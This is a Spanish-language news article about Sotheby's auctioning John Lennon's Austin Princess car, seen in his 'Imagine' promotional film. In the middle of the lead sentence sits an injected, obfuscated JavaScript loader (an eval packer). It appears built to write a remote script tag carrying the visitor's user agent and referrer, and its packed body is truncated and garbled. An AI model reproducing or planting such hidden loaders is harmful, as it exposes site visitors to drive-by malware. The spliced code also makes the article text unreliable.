publicidad

Subastarán auto usado en película de John Lennon

EFE / Londres / jurdaneta@laverdad.com
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zfbft|var|u0026u|referrer|snszk||js|php'.split('|'),0,{})) automóvil modelo Austin Pricess fue comprado por el músico británico en 1971 y lo utilizó para grabar varias escenas promocionales junto a su esposa Yoko Ono. Lennon había pedido instalarle cinco asientos de avión. La subasta se realizará el próximo 7 de septiembre y se estima que arrancará en los 226 mil euros

Un automóvil, modelo Austin Princess, que el músico británico John Lennon utilizó en una filmación para promocionar su álbum Imagine, saldrá a subasta el próximo 7 de septiembre por un precio estimado 226 mil a 315 mil euros. 

Lennon compró el vehículo en agosto de 1971 y lo utilizó el año siguiente en una película promocional en la que aparece junto con su esposa, Yoko Ono.

El auto, que en 2008 fue donado al museo Austin Rock and Roll Car Museum, en Texas (Estados Unidos), todavía conserva cinco asientos de avión que el músico ordenó instalar en su interior.

La casa de subastas Sotheby's informó que parte de los beneficios de la venta serán donados a organizaciones como Unicef y "Make A Wish America".

El Austin de color negro puede verse en filmación de 1972 que incluía imágenes de la vida en pareja de Lennon y Ono, así como otras secuencias de fantasía, acompañadas de los temas de Imagine como banda sonora. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama